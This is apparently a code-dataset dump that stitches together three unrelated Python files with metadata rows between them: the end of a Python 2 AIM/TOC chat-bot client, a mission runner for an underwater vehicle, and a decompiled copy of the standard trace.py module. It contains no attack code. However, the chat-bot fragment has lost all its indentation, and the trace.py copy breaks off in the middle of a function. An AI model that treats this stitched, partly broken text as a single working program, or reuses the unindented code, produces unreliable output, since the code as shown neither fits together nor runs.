def flap_to_toc(self,ftype,msg):
if ftype == 2:
msg = msg + struct.pack("!B", 0)
ditems = []
ditems.append("*")
ditems.append(struct.pack("!BHH",ftype,self._seq,len(msg)))
ditems.append(msg)
data = "".join(ditems)
if len(data) >= 2048:
raise TOCError, "TOC data with protocol overhead cannot exceed 2048 bytes."
self.derror( "SEND : \'%r\'" % data )
# in case we're threading
self._tsem.acquire()
bsent = self._socket.send(data)
self._tsem.release()
if bsent <> len(data):
#maybe make less severe later
# I've never seen this happen.. have you??
raise TOCError, "FATAL: Couldn't send all data to TOC Server\n"
self._seq = self._seq + 1
def pwdenc(self):
lookup = "Tic/Toc"
ept = []
x = 0
for letter in self._passwd:
ept.append("%02x" % ( ord(letter) ^ ord( lookup[x % 7]) ) )
x = x + 1
return "0x" + "".join(ept)
def process_loop(self):
# the "main" loop
while 1:
event = self.recv_event()
if not event:
continue
self.handle_event(event)
def handle_event(self,event):
self.derror( "RECV : %r" % event[1] )
#else, fig out what to do with it
#special case-- login
if event[0] == 1:
self.start_log_in()
return
if not event[1].count(":"):
data = ""
id = "NOID"
else:
ind = event[1].find(":")
id = event[1][:ind].upper()
data = event[1][ind+1:]
#handle manually now
if id == "SIGN_ON":
self.c_SIGN_ON(id,data)
return
if id == "ERROR":
self.c_ERROR(id,data)
return
#their imp
if ("on_%s" % id ) in self._dir:
exec ( "self.on_%s(data)" % id )
else:
self.werror("INFO : Received unimplemented '%s' id" % id)
def recv_event(self):
# TODO: this is a non-blocking hack.
# what if the first 6 bytes are there but nothing else?
try:
header = self._socket.recv(6)
except:
return
if header == "":
self.err_disconnect()
return
(marker,mtype,seq,buflen) = struct.unpack("!sBhh",header)
#get the info
dtemp = self._socket.recv(buflen)
data = dtemp
while len(data) != buflen:
if dtemp == "":
self.err_disconnect()
return
dtemp = self._socket.recv(buflen - len(data))
data = data + dtemp
return (mtype, data)
def thread_recv_events(self):
while self._running:
rfd,dc,dc = select.select([self._socket],[],[])
if rfd == []:
continue
try:
header = self._socket.recv(6)
except:
self.err_disconnect()
if header == "":
self.err_disconnect()
(marker,mtype,seq,buflen) = struct.unpack("!sBhh",header)
#get the info
dtemp = self._socket.recv(buflen)
data = dtemp
while len(data) != buflen:
if dtemp == "":
self.err_disconnect()
dtemp = self._socket.recv(buflen - len(data))
data = data + dtemp
if not self._ignore:
self.handle_event([mtype,data])
def err_disconnect(self):
self.werror( "INFO: Disconnected!\n" )
raise TOCDisconnectError, "FATAL: We seem to have been disconnected from the TOC server.\n"
# our event handling
def c_ERROR(self,id,data):
# let's just grab the errors we care about!
#still more fields
if data.count(":"):
dt = int (data[:data.find(":")])
else:
dt = int(data) # let's get an int outta it
if dt == 980:
raise TOCError, "FATAL: Couldn't sign on; Incorrect nickname/password combination"
elif dt == 981:
raise TOCError, "FATAL: Couldn't sign on; The AIM service is temporarily unavailable"
elif dt == 982:
raise TOCError, "FATAL: Couldn't sign on; Your warning level is too high"
elif dt == 983:
raise TOCError, "FATAL: Couldn't sign on; You have been connecting and disconnecting too frequently"
elif dt == 989:
raise TOCError, "FATAL: Couldn't sign on; An unknown error occurred"
# ... etc etc etc
else:
# try to let further implementation handle it
if ("on_%s" % id ) in self._dir:
exec ( "self.on_%s(data)" % id )
else:
self.werror("ERROR: The TOC server sent an unhandled error string: %s" % data)
def c_SIGN_ON(self,type,data):
self.flap_to_toc(2,"toc_add_buddy %s" % self.normalize(self._nick)) # needs to start up corectly
self.flap_to_toc(2,"toc_set_info %s" % self.encode(self._info) )
self.flap_to_toc(2,"toc_init_done")
self.start()
def strip_html(self,data):
return re.sub("<[^>]*>","",data)
def normbuds(self,buddies):
nbuds = []
for buddy in buddies:
nbuds.append(self.normalize(buddy))
return " ".join(nbuds)
#actions--help the user w/common tasks
#the all-important
def do_SEND_IM(self,user,message,autoaway=0):
sendmessage = "toc_send_im %s %s" % ( self.normalize(user), self.encode(message) )
if autoaway:
sendmessage = sendmessage + " auto"
self.flap_to_toc(2, sendmessage)
def do_ADD_BUDDY(self,buddies):
self.flap_to_toc(2,"toc_add_buddy %s" % self.normbuds(buddies) )
def do_ADD_PERMIT(self,buddies):
self.flap_to_toc(2,"toc_add_permit %s" % self.normbuds(buddies) )
def do_ADD_DENY(self,buddies):
self.flap_to_toc(2,"toc_add_deny %s" % self.normbuds(buddies) )
def do_REMOVE_BUDDY(self,buddies):
self.flap_to_toc(2,"toc_remove_buddy %s" % self.normbuds(buddies) )
# away, idle, user info handling
def do_SET_IDLE(self,itime):
self.flap_to_toc(2,"toc_set_idle %d" % itime )
def do_SET_AWAY(self,awaymess):
if awaymess == "":
self.flap_to_toc(2,"toc_set_away")
return
self.flap_to_toc(2,"toc_set_away %s" % self.encode(awaymess) )
def do_GET_INFO(self,user):
self.flap_to_toc(2,"toc_get_info %s" % self.normalize(user) )
def do_SET_INFO(self,info):
self.flap_to_toc(2,"toc_set_info %s" % self.encode(info) )
# warning capability
def do_EVIL(self,user,anon=0):
if anon:
acode = "anon"
else:
acode = "norm"
self.flap_to_toc(2,"toc_evil %s %s" % (self.normalize(user), acode) )
#chat
def do_CHAT_INVITE(self,room,imess,buddies):
self.flap_to_toc(2,"toc_chat_invite %s %s %s" % (self.normalize(room),
self.encode(imess), self.normbuds(buddies) ) )
def do_CHAT_ACCEPT(self, id):
self.flap_to_toc(2,"toc_chat_accept %s" % id)
def do_CHAT_LEAVE(self,id):
self.flap_to_toc(2,"toc_chat_leave %s" % id)
def do_CHAT_WHISPER(self,room,user,message):
self.flap_to_toc(2,"toc_chat_whisper %s %s %s" % (room,
self.normalize(user), self.encode(message) ) )
def do_CHAT_SEND(self,room,message):
self.flap_to_toc(2,"toc_chat_send %s %s" % (room,
self.encode(message) ) )
def do_CHAT_JOIN(self,roomname):
self.flap_to_toc(2,"toc_chat_join 4 %s" % roomname)
def do_SET_CONFIG(self,configstr):
self.flap_to_toc(2,"toc_set_config \"%s\"" % configstr)
# error funcs
def werror(self,errorstr):
if self._debug:
self._logfd.write("(%s) %s\n"% (self._nick,errorstr))
def derror(self,errorstr):
if self._debug > 1:
self._logfd.write("(%s) %s\n"% (self._nick,errorstr))
class BotManagerError(Exception):
pass
class BotManager:
    """Registry that runs multiple bots, each on its own thread, with
    optional automatic reconnection on TOCDisconnectError.

    NOTE: this is Python 2 code (dict.has_key, `raise Cls, msg` syntax,
    the `thread` module); it will not run unmodified on Python 3.
    """
    def __init__(self):
        # Maps caller-chosen botref keys to bot instances.
        self.bots = {}
    def addBot(self,bot,botref,go=1,reconnect=1,delay=30):
        """Register a bot under botref; optionally start it immediately.

        reconnect: retry after a disconnect; delay: seconds between retries.
        """
        if self.bots.has_key(botref):
            raise BotManagerError, "That botref is already registered"
        self.bots[botref] = bot
        self.bots[botref]._reconnect = reconnect
        self.bots[botref]._delay = delay
        if go:
            self.botGo(botref)
    def botGo(self,botref):
        """Start the bot's event loop on a new thread."""
        if not self.bots.has_key(botref):
            raise BotManagerError, "That botref has not been registered"
        thread.start_new_thread(self._dispatcher,(self.bots[botref],))
    def botStop(self,botref):
        """Stop a bot: clear its running flag and close its socket."""
        if not self.bots.has_key(botref):
            raise BotManagerError, "That botref has not been registered"
        self.bots[botref]._running = 0
        self.bots[botref]._socket.close()
    def botPause(self,botref,val=1):
        """Set (or clear, with val=0) the bot's ignore flag."""
        if not self.bots.has_key(botref):
            raise BotManagerError, "That botref has not been registered"
        self.bots[botref]._ignore = val
    def getBot(self,botref):
        """Return the bot instance registered under botref."""
        if not self.bots.has_key(botref):
            raise BotManagerError, "That botref has not been registered"
        return self.bots[botref]
    def _dispatcher(self,bot):
        """Thread body: connect and pump events, reconnecting after drops
        when the bot's _reconnect flag is set and it was not stopped."""
        while 1:
            try:
                bot.connect()
                bot._running = 1
                bot.thread_recv_events()
            except TOCDisconnectError:
                if not bot._reconnect or not bot._running:
                    break
                bot._running = 0
                time.sleep(bot._delay) # then we reconnect
            else:
                break
        thread.exit()
    def wait(self):
        """Block the calling thread forever (sleeps in a loop)."""
        while 1:
            time.sleep(2000000) # not coming back from this...
| [
"66761962+satire6@users.noreply.github.com"
] | 66761962+satire6@users.noreply.github.com |
c3d423561ba81e648124b4013b007394c0427eff | e665fe109ce9823d965e303ca8677b5a065ad9df | /mission/runner.py | d1907d30f805a18b3e0801c7c0ac9525481d2f53 | [
"BSD-3-Clause"
] | permissive | deciament/software | 822a704dfaab84f5260a284271cdec1b3664b94f | 06ad1d9ea239d116252510beed248bc6031cd622 | refs/heads/master | 2021-01-14T12:40:04.946245 | 2015-12-31T02:28:33 | 2015-12-31T02:28:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,653 | py | #!/usr/bin/env python3.4
import time, argparse, traceback, sys, datetime, os, shm
# Note: this is a hack; will only function if your PYTHONPATH is solely the standard software one (~/cuauv/software; i.e. the root directory of the repo)
pythonpath = os.environ.get('PYTHONPATH')
sys.path.append(pythonpath + '/mission')
from auv_python_helpers.colors import *
from mission.framework.auxiliary import zero_outputs
from mission.framework.task import Task
from auvlog.client import log as auvlog
def foldl(f, acc, l):
    """Left-fold l with f starting from acc: f(...f(f(acc, l[0]), l[1])...).

    This is exactly functools.reduce with an initializer, so delegate to it
    (C-speed iteration, identical semantics including the empty-l case,
    which returns acc unchanged).
    """
    from functools import reduce
    return reduce(f, l, acc)
def exit(status):
    """Clear the mission-start flag in shared memory, then terminate.

    NOTE(review): intentionally shadows the builtin exit(); all exits in this
    script go through here so the vehicle's start switch is always reset.
    """
    shm.mission_start_switch.mission_start.set(0)
    sys.exit(status)
# Command-line interface for the mission runner.
parser = argparse.ArgumentParser()
parser.add_argument(
    '-n',
    '--nticks',
    help='Run N mission ticks instead of running continuously.',
    default=None,
    type=int)
parser.add_argument(
    '-t',
    '--task',
    help='Task name to load; default "Main".',
    default='Main',
    type=str)
parser.add_argument(
    '-f',
    '--file',
    help='File from which to load the task; default "teagle.py".',
    default='teagle.py',
    type=str)
parser.add_argument(
    '-r',
    '--rate',
    help='Number of mission ticks to run per second; default 50',
    default=50,
    type=int)
# NOTE(review): type=bool is an argparse gotcha - bool("False") is True, so
# any non-empty value passed to -q enables quiet mode. action='store_true'
# was almost certainly intended; left as-is to preserve the CLI contract.
parser.add_argument(
    '-q',
    '--quiet',
    help="Don't ouput diagnostic messages.",
    default=False,
    type=bool)
args = parser.parse_args()
def fmt(n_ticks, msg):
    """Build a colored mission log line: timestamp, tag, tick number, message."""
    stamp = red(datetime.datetime.now().isoformat())
    tag = yellow('MISSION')
    tick = green(str(n_ticks))
    return '[{0}] ({1}) Tick: {2} Message: {3}'.format(stamp, tag, tick, msg)
def log(n_ticks, msg):
    """Print a formatted diagnostic line unless --quiet was given."""
    if args.quiet:
        return
    print(fmt(n_ticks, msg))
def error(n_ticks, msg):
    """Write a formatted line to stderr and flush it immediately."""
    line = fmt(n_ticks, msg) + "\n"
    sys.stderr.write(line)
    sys.stderr.flush()
def logR(n_ticks, msg):
    """Like log(), but ends with a carriage return so the line is overwritten in place."""
    if args.quiet:
        return
    print(fmt(n_ticks, msg) + '\r', end = '')
if __name__ == '__main__':
    # Resolve the module holding the mission task. The first __import__ makes
    # sure dotted submodules are actually imported (so getattr can find them);
    # the foldl then walks the attribute chain down from the top-level package.
    try:
        module_name = args.file[:-3] if args.file[-3:] == '.py' else args.file
        split = module_name.split('.')
        # Python imports are ludicrous.
        module = __import__(module_name)
        module = foldl(lambda x, y: getattr(x, y), __import__(split[0]), split[1:])
    except ImportError as e:
        error(0, 'Error importing module "{0}". Perhaps this file does not exist or is not in your PYTHONPATH.'.format(args.file))
        error(0, 'Traceback: \n\n{0}'.format(traceback.format_exc()))
        exit(1)
    try:
        task = getattr(module, args.task)
    except AttributeError:
        error(0, 'Error loading task "{0}". Perhaps this task does not exist within the specified file or was misspelled.'.format(args.task))
        exit(1)
    n_ticks = 0
    last = time.time()
    try:
        log(0, 'Starting mission.')
        shm.mission_start_switch.mission_start.set(1)
        # Main tick loop: call the task at the requested rate until it reports
        # finished or the optional tick budget (-n) is exhausted.
        while args.nticks is None or n_ticks < args.nticks:
            start = time.time()
            delta = start - last
            try:
                task()
            except Exception as e:
                print(e)
            # Sleep off the remainder of this tick to hold the requested rate.
            time.sleep(max((1 / args.rate) - delta, 0))
            if hasattr(task, 'finished') and task.finished:
                error(n_ticks, 'Mission complete.')
                zero_outputs()
                exit(0)
            else:
                logR(n_ticks, 'Ticked.')
            n_ticks += 1
            last = start
        if args.nticks == n_ticks:
            log(n_ticks, 'Mission complete.')
            zero_outputs()
            exit(0)
        error(n_ticks, "Should not be here!")
    except Exception as e:
        error(n_ticks, 'Exception encountered. Traceback: \n\n{0}'.format(traceback.format_exc()))
        error(n_ticks, 'Mission terminated; zeroing outputs.')
        zero_outputs()
        # exit(1)
    except KeyboardInterrupt:
        zero_outputs()
        exit(0)
| [
"software@cuauv.org"
] | software@cuauv.org |
c1fd20c4eea3537d21b0008d159d2b0bd475ec74 | 59de7788673ade984b9c9fbc33664a7cbdba67d3 | /res_bw/scripts/common/lib/trace.py | d37d013782ea519e0ad3801b919f72486f9fd5b1 | [] | no_license | webiumsk/WOT-0.9.15-CT | 3fa24ab37a6c91b7073034afb2f355efa5b7fe36 | fbd194fbaa6bdece51c7a68fc35bbb5257948341 | refs/heads/master | 2020-12-24T21:27:23.175774 | 2016-05-01T13:47:44 | 2016-05-01T13:47:44 | 57,600,180 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 24,614 | py | # 2016.05.01 15:28:28 Střední Evropa (letní čas)
# Embedded file name: scripts/common/Lib/trace.py
"""program/module to trace Python program or function execution
Sample use, command line:
trace.py -c -f counts --ignore-dir '$prefix' spam.py eggs
trace.py -t --ignore-dir '$prefix' spam.py eggs
trace.py --trackcalls spam.py eggs
Sample use, programmatically
import sys
# create a Trace object, telling it what to ignore, and whether to
# do tracing or line-counting or both.
tracer = trace.Trace(ignoredirs=[sys.prefix, sys.exec_prefix,], trace=0,
count=1)
# run the new command using the given tracer
tracer.run('main()')
# make a report, placing output in /tmp
r = tracer.results()
r.write_results(show_missing=True, coverdir="/tmp")
"""
import linecache
import os
import re
import sys
import time
import token
import tokenize
import inspect
import gc
import dis
try:
import cPickle
pickle = cPickle
except ImportError:
import pickle
try:
import threading
except ImportError:
_settrace = sys.settrace
def _unsettrace():
sys.settrace(None)
return
else:
def _settrace(func):
threading.settrace(func)
sys.settrace(func)
def _unsettrace():
sys.settrace(None)
threading.settrace(None)
return
def usage(outfile):
    """Write the trace.py command-line help text to *outfile*."""
    outfile.write("Usage: %s [OPTIONS] <file> [ARGS]\n\nMeta-options:\n--help                Display this help then exit.\n--version             Output version information then exit.\n\nOtherwise, exactly one of the following three options must be given:\n-t, --trace           Print each line to sys.stdout before it is executed.\n-c, --count           Count the number of times each line is executed\n                      and write the counts to <module>.cover for each\n                      module executed, in the module's directory.\n                      See also `--coverdir', `--file', `--no-report' below.\n-l, --listfuncs       Keep track of which functions are executed at least\n                      once and write the results to sys.stdout after the\n                      program exits.\n-T, --trackcalls      Keep track of caller/called pairs and write the\n                      results to sys.stdout after the program exits.\n-r, --report          Generate a report from a counts file; do not execute\n                      any code.  `--file' must specify the results file to\n                      read, which must have been created in a previous run\n                      with `--count --file=FILE'.\n\nModifiers:\n-f, --file=<file>     File to accumulate counts over several runs.\n-R, --no-report       Do not generate the coverage report files.\n                      Useful if you want to accumulate over several runs.\n-C, --coverdir=<dir>  Directory where the report files.  The coverage\n                      report for <package>.<module> is written to file\n                      <dir>/<package>/<module>.cover.\n-m, --missing         Annotate executable lines that were not executed\n                      with '>>>>>> '.\n-s, --summary         Write a brief summary on stdout for each file.\n                      (Can only be used with --count or --report.)\n-g, --timing          Prefix each line with the time since the program started.\n                      Only used while tracing.\n\nFilters, may be repeated multiple times:\n--ignore-module=<mod> Ignore the given module(s) and its submodules\n                      (if it is a package).  Accepts comma separated\n                      list of module names\n--ignore-dir=<dir>    Ignore files in the given directory (multiple\n                      directories can be joined by os.pathsep).\n" % sys.argv[0])
# Marker comment that excludes a line from ">>>>>>" missing-line annotation.
PRAGMA_NOCOVER = '#pragma NO COVER'
# Matches lines that are blank or contain only a comment.
rx_blank = re.compile('^\\s*(#.*)?$')
class Ignore:
    """Decide whether a (filename, modulename) pair should be ignored.

    Matches against a list of module names (including their submodules) and
    a list of directory prefixes; decisions are memoized per module name in
    self._ignore (1 = ignore, 0 = trace).
    """

    def __init__(self, modules = None, dirs = None):
        self._mods = modules or []
        # BUG FIX: materialize the normalized directory list. On Python 3,
        # map() returns a one-shot iterator; storing it meant the directory
        # filter was silently exhausted after the first names() call that
        # scanned it, so later modules in ignored dirs were NOT ignored.
        self._dirs = list(map(os.path.normpath, dirs or []))
        self._ignore = {'<string>': 1}

    def names(self, filename, modulename):
        """Return 1 if the module should be ignored, else 0 (memoized)."""
        if modulename in self._ignore:
            return self._ignore[modulename]
        for mod in self._mods:
            if mod == modulename:
                self._ignore[modulename] = 1
                return 1
            n = len(mod)
            # Submodule of an ignored package, e.g. mod="pkg", modulename="pkg.sub".
            if mod == modulename[:n] and modulename[n] == '.':
                self._ignore[modulename] = 1
                return 1
        if filename is None:
            # No backing file (exec'd or built-in code): nothing to trace.
            self._ignore[modulename] = 1
            return 1
        for d in self._dirs:
            if filename.startswith(d + os.sep):
                self._ignore[modulename] = 1
                return 1
        self._ignore[modulename] = 0
        return 0
def modname(path):
    """Return a plausible module name for the path (basename sans extension)."""
    stem, _ext = os.path.splitext(os.path.basename(path))
    return stem
def fullmodname(path):
    """Return a plausible dotted module name (package.module) for the path."""
    comparepath = os.path.normcase(path)
    longest = ''
    # Find the longest sys.path entry that is a proper prefix of the path.
    # NOTE(review): comparepath[len(dir)] raises IndexError if the path IS
    # exactly a sys.path entry - presumably never hit in practice; confirm.
    for dir in sys.path:
        dir = os.path.normcase(dir)
        if comparepath.startswith(dir) and comparepath[len(dir)] == os.sep:
            if len(dir) > len(longest):
                longest = dir

    if longest:
        base = path[len(longest) + 1:]
    else:
        base = path
    drive, base = os.path.splitdrive(base)
    # Convert the remaining relative path into dotted form.
    base = base.replace(os.sep, '.')
    if os.altsep:
        base = base.replace(os.altsep, '.')
    filename, ext = os.path.splitext(base)
    return filename.lstrip('.')
class CoverageResults:
    """Accumulates line-execution counts, called functions and caller pairs,
    optionally merged with a previous run loaded from a pickle file, and
    writes per-module .cover report files.

    NOTE: Python 2 code (print statements, dict.iteritems); it will not run
    unmodified on Python 3.
    """

    def __init__(self, counts = None, calledfuncs = None, infile = None, callers = None, outfile = None):
        # Copies are taken so callers' dicts are never mutated in place.
        self.counts = counts
        if self.counts is None:
            self.counts = {}
        self.counter = self.counts.copy()
        self.calledfuncs = calledfuncs
        if self.calledfuncs is None:
            self.calledfuncs = {}
        self.calledfuncs = self.calledfuncs.copy()
        self.callers = callers
        if self.callers is None:
            self.callers = {}
        self.callers = self.callers.copy()
        self.infile = infile
        self.outfile = outfile
        if self.infile:
            # Merge in previously pickled results; skip corrupt/missing files.
            try:
                counts, calledfuncs, callers = pickle.load(open(self.infile, 'rb'))
                self.update(self.__class__(counts, calledfuncs, callers))
            except (IOError, EOFError, ValueError) as err:
                print >> sys.stderr, 'Skipping counts file %r: %s' % (self.infile, err)

        return

    def update(self, other):
        """Merge in the data from another CoverageResults"""
        counts = self.counts
        calledfuncs = self.calledfuncs
        callers = self.callers
        other_counts = other.counts
        other_calledfuncs = other.calledfuncs
        other_callers = other.callers
        # Counts are summed; called-func and caller entries are flags (set to 1).
        for key in other_counts.keys():
            counts[key] = counts.get(key, 0) + other_counts[key]

        for key in other_calledfuncs.keys():
            calledfuncs[key] = 1

        for key in other_callers.keys():
            callers[key] = 1

    def write_results(self, show_missing = True, summary = False, coverdir = None):
        """Write the accumulated results.

        Prints called functions and caller/callee relationships (if tracked),
        writes one <module>.cover file per traced module (into coverdir if
        given, else next to the source), optionally prints a per-module
        summary, and pickles the raw data to self.outfile if set.
        """
        if self.calledfuncs:
            print
            print 'functions called:'
            calls = self.calledfuncs.keys()
            calls.sort()
            for filename, modulename, funcname in calls:
                print 'filename: %s, modulename: %s, funcname: %s' % (filename, modulename, funcname)

        if self.callers:
            print
            print 'calling relationships:'
            calls = self.callers.keys()
            calls.sort()
            lastfile = lastcfile = ''
            for (pfile, pmod, pfunc), (cfile, cmod, cfunc) in calls:
                if pfile != lastfile:
                    print
                    print '***', pfile, '***'
                    lastfile = pfile
                    lastcfile = ''
                if cfile != pfile and lastcfile != cfile:
                    print '  -->', cfile
                    lastcfile = cfile
                print '    %s.%s -> %s.%s' % (pmod,
                 pfunc,
                 cmod,
                 cfunc)

        # Regroup the flat {(filename, lineno): count} dict per file.
        per_file = {}
        for filename, lineno in self.counts.keys():
            lines_hit = per_file[filename] = per_file.get(filename, {})
            lines_hit[lineno] = self.counts[filename, lineno]

        sums = {}
        for filename, count in per_file.iteritems():
            if filename == '<string>':
                continue
            if filename.startswith('<doctest '):
                continue
            if filename.endswith(('.pyc', '.pyo')):
                # Report against the .py source, not the compiled file.
                filename = filename[:-1]
            if coverdir is None:
                dir = os.path.dirname(os.path.abspath(filename))
                modulename = modname(filename)
            else:
                dir = coverdir
                if not os.path.exists(dir):
                    os.makedirs(dir)
                modulename = fullmodname(filename)
            if show_missing:
                lnotab = find_executable_linenos(filename)
            else:
                lnotab = {}
            source = linecache.getlines(filename)
            coverpath = os.path.join(dir, modulename + '.cover')
            n_hits, n_lines = self.write_results_file(coverpath, source, lnotab, count)
            if summary and n_lines:
                percent = 100 * n_hits // n_lines
                sums[modulename] = (n_lines,
                 percent,
                 modulename,
                 filename)

        if summary and sums:
            mods = sums.keys()
            mods.sort()
            print 'lines   cov%   module   (path)'
            for m in mods:
                n_lines, percent, modulename, filename = sums[m]
                print '%5d   %3d%%   %s   (%s)' % sums[m]

        if self.outfile:
            # Persist raw data so a later run can accumulate onto it.
            try:
                pickle.dump((self.counts, self.calledfuncs, self.callers), open(self.outfile, 'wb'), 1)
            except IOError as err:
                print >> sys.stderr, "Can't save counts files because %s" % err

        return

    def write_results_file(self, path, lines, lnotab, lines_hit):
        """Write one annotated .cover file; return (n_hits, n_lines)."""
        try:
            outfile = open(path, 'w')
        except IOError as err:
            print >> sys.stderr, 'trace: Could not open %r for writing: %s- skipping' % (path, err)
            return (0, 0)

        n_lines = 0
        n_hits = 0
        for i, line in enumerate(lines):
            lineno = i + 1
            if lineno in lines_hit:
                # Executed line: prefix with its hit count.
                outfile.write('%5d: ' % lines_hit[lineno])
                n_hits += 1
                n_lines += 1
            elif rx_blank.match(line):
                outfile.write('       ')
            elif lineno in lnotab and PRAGMA_NOCOVER not in lines[i]:
                # Executable but never hit (and not pragma-excluded).
                outfile.write('>>>>>> ')
                n_lines += 1
            else:
                outfile.write('       ')
            outfile.write(lines[i].expandtabs(8))

        outfile.close()
        return (n_hits, n_lines)
def find_lines_from_code(code, strs):
    """Return a dict keyed by the executable line numbers of *code*,
    excluding any line numbers present in *strs* (docstring lines)."""
    return {
        lineno: 1
        for _offset, lineno in dis.findlinestarts(code)
        if lineno not in strs
    }
def find_lines(code, strs):
    """Return a lineno dict for *code* and every code object nested in its
    constants (functions, classes, comprehensions), recursively."""
    linenos = find_lines_from_code(code, strs)
    nested = (const for const in code.co_consts if inspect.iscode(const))
    for child in nested:
        linenos.update(find_lines(child, strs))
    return linenos
def find_strings(filename):
    """Return a dict of possible docstring positions.

    Maps every line number covered by a string token that directly follows
    an INDENT token (i.e. a docstring, possibly triple-quoted) to 1.
    """
    positions = {}
    with open(filename) as fobj:
        prev_type = token.INDENT
        token_stream = tokenize.generate_tokens(fobj.readline)
        for tok_type, _text, (srow, _scol), (erow, _ecol), _line in token_stream:
            if tok_type == token.STRING and prev_type == token.INDENT:
                for row in range(srow, erow + 1):
                    positions[row] = 1
            prev_type = tok_type
    return positions
def find_executable_linenos(filename):
    """Return dict where keys are line numbers in the line number table."""
    try:
        prog = open(filename, 'rU').read()
    except IOError as err:
        # Unreadable source: report and treat as having no executable lines.
        print >> sys.stderr, 'Not printing coverage data for %r: %s' % (filename, err)
        return {}

    code = compile(prog, filename, 'exec')
    # Exclude lines that are (part of) docstrings.
    strs = find_strings(filename)
    return find_lines(code, strs)
class Trace:
    """Runs code under sys.settrace and dispatches to the tracer pair that
    matches the mode chosen at construction (trace, count, both, function
    listing, or caller tracking).

    NOTE: Python 2 code (print statements); will not run unmodified on
    Python 3.
    """

    def __init__(self, count = 1, trace = 1, countfuncs = 0, countcallers = 0, ignoremods = (), ignoredirs = (), infile = None, outfile = None, timing = False):
        """
        @param count true iff it should count number of times each
                     line is executed
        @param trace true iff it should print out each line that is
                     being counted
        @param countfuncs true iff it should just output a list of
                     (filename, modulename, funcname,) for functions
                     that were called at least once;  This overrides
                     `count' and `trace'
        @param ignoremods a list of the names of modules to ignore
        @param ignoredirs a list of the names of directories to ignore
                     all of the (recursive) contents of
        @param infile file from which to read stored counts to be
                     added into the results
        @param outfile file in which to write the results
        @param timing true iff timing information be displayed
        """
        self.infile = infile
        self.outfile = outfile
        self.ignore = Ignore(ignoremods, ignoredirs)
        self.counts = {}
        self.blabbed = {}
        self.pathtobasename = {}
        self.donothing = 0
        self.trace = trace
        self._calledfuncs = {}
        self._callers = {}
        self._caller_cache = {}
        self.start_time = None
        if timing:
            self.start_time = time.time()
        # Select the global/local trace handler pair for the requested mode.
        if countcallers:
            self.globaltrace = self.globaltrace_trackcallers
        elif countfuncs:
            self.globaltrace = self.globaltrace_countfuncs
        elif trace and count:
            self.globaltrace = self.globaltrace_lt
            self.localtrace = self.localtrace_trace_and_count
        elif trace:
            self.globaltrace = self.globaltrace_lt
            self.localtrace = self.localtrace_trace
        elif count:
            self.globaltrace = self.globaltrace_lt
            self.localtrace = self.localtrace_count
        else:
            self.donothing = 1
        return

    def run(self, cmd):
        """Trace cmd executed in __main__'s namespace."""
        import __main__
        dict = __main__.__dict__
        self.runctx(cmd, dict, dict)

    def runctx(self, cmd, globals = None, locals = None):
        """Trace cmd executed with the given globals/locals; tracing is
        always uninstalled afterwards."""
        if globals is None:
            globals = {}
        if locals is None:
            locals = {}
        if not self.donothing:
            _settrace(self.globaltrace)
        try:
            exec cmd in globals, locals
        finally:
            if not self.donothing:
                _unsettrace()

        return

    def runfunc(self, func, *args, **kw):
        """Trace a single function call and return its result."""
        result = None
        if not self.donothing:
            sys.settrace(self.globaltrace)
        try:
            result = func(*args, **kw)
        finally:
            if not self.donothing:
                sys.settrace(None)

        return result

    def file_module_function_of(self, frame):
        """Return (filename, modulename, funcname) for the frame; attempts
        to recover the defining class name (via gc referrer walking) so
        methods are reported as Class.method. Results are cached per code
        object in self._caller_cache."""
        code = frame.f_code
        filename = code.co_filename
        if filename:
            modulename = modname(filename)
        else:
            modulename = None
        funcname = code.co_name
        clsname = None
        if code in self._caller_cache:
            if self._caller_cache[code] is not None:
                clsname = self._caller_cache[code]
        else:
            self._caller_cache[code] = None
            # Walk code -> function -> class __dict__ -> class; only trust
            # the result when each step is unambiguous.
            funcs = [ f for f in gc.get_referrers(code) if inspect.isfunction(f) ]
            if len(funcs) == 1:
                dicts = [ d for d in gc.get_referrers(funcs[0]) if isinstance(d, dict) ]
                if len(dicts) == 1:
                    classes = [ c for c in gc.get_referrers(dicts[0]) if hasattr(c, '__bases__') ]
                    if len(classes) == 1:
                        clsname = classes[0].__name__
                        self._caller_cache[code] = clsname
        if clsname is not None:
            funcname = '%s.%s' % (clsname, funcname)
        return (filename, modulename, funcname)

    def globaltrace_trackcallers(self, frame, why, arg):
        """Handler for call events.

        Adds information about who called who to the self._callers dict.
        """
        if why == 'call':
            this_func = self.file_module_function_of(frame)
            parent_func = self.file_module_function_of(frame.f_back)
            self._callers[parent_func, this_func] = 1

    def globaltrace_countfuncs(self, frame, why, arg):
        """Handler for call events.

        Adds (filename, modulename, funcname) to the self._calledfuncs dict.
        """
        if why == 'call':
            this_func = self.file_module_function_of(frame)
            self._calledfuncs[this_func] = 1

    def globaltrace_lt(self, frame, why, arg):
        """Handler for call events.

        If the code block being entered is to be ignored, returns `None',
        else returns self.localtrace.
        """
        if why == 'call':
            code = frame.f_code
            filename = frame.f_globals.get('__file__', None)
            if filename:
                # Ignore filtering is keyed on the module name, not the path.
                modulename = modname(filename)
                if modulename is not None:
                    ignore_it = self.ignore.names(filename, modulename)
                    if not ignore_it:
                        if self.trace:
                            print ' --- modulename: %s, funcname: %s' % (modulename, code.co_name)
                        return self.localtrace
            else:
                return

        return

    def localtrace_trace_and_count(self, frame, why, arg):
        """Per-line handler: count the line and echo it to stdout."""
        if why == 'line':
            filename = frame.f_code.co_filename
            lineno = frame.f_lineno
            key = (filename, lineno)
            self.counts[key] = self.counts.get(key, 0) + 1
            if self.start_time:
                print '%.2f' % (time.time() - self.start_time),
            bname = os.path.basename(filename)
            print '%s(%d): %s' % (bname, lineno, linecache.getline(filename, lineno)),
        return self.localtrace

    def localtrace_trace(self, frame, why, arg):
        """Per-line handler: echo the line to stdout (no counting)."""
        if why == 'line':
            filename = frame.f_code.co_filename
            lineno = frame.f_lineno
            if self.start_time:
                print '%.2f' % (time.time() - self.start_time),
            bname = os.path.basename(filename)
            print '%s(%d): %s' % (bname, lineno, linecache.getline(filename, lineno)),
        return self.localtrace

    def localtrace_count(self, frame, why, arg):
        """Per-line handler: count the line only."""
        if why == 'line':
            filename = frame.f_code.co_filename
            lineno = frame.f_lineno
            key = (filename, lineno)
            self.counts[key] = self.counts.get(key, 0) + 1
        return self.localtrace

    def results(self):
        """Package the collected data into a CoverageResults instance."""
        return CoverageResults(self.counts, infile=self.infile, outfile=self.outfile, calledfuncs=self._calledfuncs, callers=self._callers)
def _err_exit(msg):
